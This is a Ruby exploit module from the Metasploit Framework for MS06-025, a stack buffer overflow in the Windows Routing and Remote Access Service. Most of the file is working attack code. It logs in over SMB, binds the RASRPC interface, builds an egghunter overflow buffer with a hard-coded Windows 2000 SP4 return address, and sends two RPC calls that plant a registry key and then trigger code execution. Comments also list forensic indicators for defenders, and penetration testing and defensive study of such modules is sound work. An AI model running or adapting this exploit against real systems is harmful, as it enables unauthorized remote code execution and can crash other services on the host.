
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for MS06-025 / CVE-2006-2370, a registry-based stack buffer
  # overflow in the Windows Routing and Remote Access Service (RASMAN).
  #
  # Two RPC calls are made with the same stub: the first creates a registry
  # key, the second triggers the overflow when the service reads it back
  # (see the status messages in #exploit and the Description below).
  #
  # Defender-relevant artifacts, all taken from this module's own metadata
  # and code:
  #   * an authenticated SMB session followed by a DCERPC bind to interface
  #     UUID 20610036-fa22-11cf-9823-00a0c911e5df over the SMBPIPE named pipe;
  #   * a persistent registry key under
  #     HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook, which the
  #     Description says survives and must be removed manually before any
  #     re-attempt -- a useful forensic indicator of an attempt;
  #   * the service runs inside svchost.exe, so a failed attempt may take
  #     other hosted services down with it.
  Rank = GoodRanking

  # Payload is staged via an egghunter; the transport is DCERPC carried over
  # an SMB named pipe (authenticated via SMB::Client).
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Registers module metadata, payload constraints, the single target and the
  # SMBPIPE option.
  #
  # @param info [Hash] module info overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',
      'Description' => %q{
        This module exploits a registry-based stack buffer overflow in the Windows Routing
        and Remote Access Service. Since the service is hosted inside svchost.exe,
        a failed exploit attempt can cause other system services to fail as well.
        A valid username and password is required to exploit this flaw on Windows 2000.
        When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
        Exploiting this flaw involves two distinct steps - creating the registry key
        and then triggering an overwrite based on a read of this key. Once the key is
        created, it cannot be recreated. This means that for any given system, you
        only get one chance to exploit this flaw. Picking the wrong target will require
        a manual removal of the following registry key before you can try again:
        HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
      },
      'Author' => [ 'pusscat', 'hdm' ],
      'License' => BSD_LICENSE,
      'References' =>
        [
          [ 'CVE', '2006-2370' ],
          [ 'OSVDB', '26437' ],
          [ 'BID', '18325' ],
          [ 'MSB', 'MS06-025' ]
        ],
      # The vulnerable service runs with service-level privileges.
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload' =>
        {
          'Space' => 512,
          # Bytes the encoded payload must not contain:
          # NUL, ',' (0x2c), '\' (0x5c), '.' (0x2e), ':' (0x3a), '$' (0x24).
          'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      # Single hard-coded target; the 'Ret' value is specific to this
      # Windows 2000 SP4 build and is what makes the module one-shot
      # against a mis-identified host (see Description).
      'Targets' =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2006-06-13'))

    # SMBPIPE is the named pipe the DCERPC interface is bound over.
    # The option description string ("Rawr.") is not informative; per the
    # Description above, XP SP1 requires 'SRVSVC' while the default is
    # 'router'.
    register_options(
      [
        OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
      ])
  end

  # Post authentication bugs are rarely useful during automation
  #
  # @return [Boolean] always false, so this module is excluded from
  #   automatic exploitation (requires valid credentials).
  def autofilter
    false
  end

  # Authenticates over SMB, binds the RPC interface, builds the request stub
  # and issues the two RPC calls described at the top of the class.
  #
  # The byte layout (offsets such as 84, 178, 886 and the field ordering of
  # type1/type2) is target-specific and order-dependent; it is reproduced
  # here unchanged and the inline comments below are the authors'.
  def exploit
    # Authenticated SMB session (credentials come from the SMB::Client
    # options); the Description notes valid credentials are required.
    connect()
    smb_login()
    print_status("Trying target #{target.name}...")

    # Generate the egghunter payload
    # hunter[0] is the egghunter stub placed in the overflow buffer below;
    # hunter[1] is the egg-tagged payload placed in eggdata.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]

    # Pick a "filler" character that we know doesn't get mangled
    # by the wide string conversion routines
    # rand() makes the filler differ per run, so the stub is not a fixed
    # byte pattern. NOTE: String#[Integer] already returns a one-character
    # String on Ruby 1.9+, so .chr is a no-op there (it mattered on 1.8,
    # where indexing returned an Integer).
    filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
    fil = filset[ rand(filset.length) ].chr

    # Bind to the actual DCERPC interface
    # NOTE(review): this UUID appears to be the RASRPC interface -- confirm
    # against the IDL. The bind target is "\\<SMBPIPE>" on the SMB session.
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    # Add giant blocks of guard data before and after the egg
    eggdata =
      fil * 1024 +
      egg +
      fil * 1024

    # Place the egghunter where ESI happens to point
    bof = (fil * 178)
    bof[84, hunter[0].length] = hunter[0]

    # Overwrite the SEH ptr, even though ESP is smashed
    # The handle after the ret must be an invalid address
    pat =
      (fil * 886) +
      NDR.long(target.ret) +
      (fil * 3) + "\xc0" +
      bof

    # Nested structure consumed by CallbackListFromRpc (see type1 below).
    # NDR.string / NDR.long are the NDR marshalling helpers from the DCERPC
    # mixin; each string is explicitly NUL-terminated here.
    type2 =
      NDR.string( (fil * 1024) + "\x00" ) +
      NDR.string( pat + "\x00" ) +
      NDR.string( (fil * 4096) + "\x00" ) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    # Outer structure. Fields that do not matter for the overflow are filled
    # with random 32-bit values; the trailing comments name the fields.
    type1 =
      NDR.long(rand(0xffffffff)) + # OperatorDial
      NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
      NDR.long(rand(0xffffffff)) + # UseLocation
      NDR.long(rand(0xffffffff)) + # ShowLights
      NDR.long(rand(0xffffffff)) + # ShowConnectStatus
      NDR.long(rand(0xffffffff)) + # CloseOnDial
      NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
      NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
      NDR.long(rand(0xffffffff)) + # SkipConnectComplete
      NDR.long(rand(0xffffffff)) + # NewEntryWizard
      NDR.long(rand(0xffffffff)) + # RedialAttempts
      NDR.long(rand(0xffffffff)) + # RedialSeconds
      NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
      NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
      NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
      NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
      NDR.long(rand(0xffffffff)) + # CallbackMode

      NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
      NDR.wstring("\x00" * 129) +
      NDR.long(rand(0xffffffff)) +
      NDR.wstring("\x00" * 520) +
      NDR.wstring("\x00" * 520) +

      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +

      NDR.string("\x00" * 514) +

      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    # Full request stub: outer structure, one more random long, then the
    # egg surrounded by its guard data.
    stubdata =
      type1 +
      NDR.long(rand(0xffffffff)) +
      eggdata

    print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

    # Both calls use opnum 0xA with the identical stub. The first call
    # persists the registry key; the second makes the service read it back,
    # which is the overflow trigger. A NoResponse from the service is
    # expected on the second call and is swallowed without any status
    # output; the `response` locals are assigned but never read.
    begin
      print_status('Creating the malicious registry key...')
      response = dcerpc.call(0xA, stubdata)

      print_status('Attempting to trigger the base pointer overwrite...')
      response = dcerpc.call(0xA, stubdata)

    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    # Hand off to the payload handler, then tear down the SMB session.
    handler
    disconnect
  end
end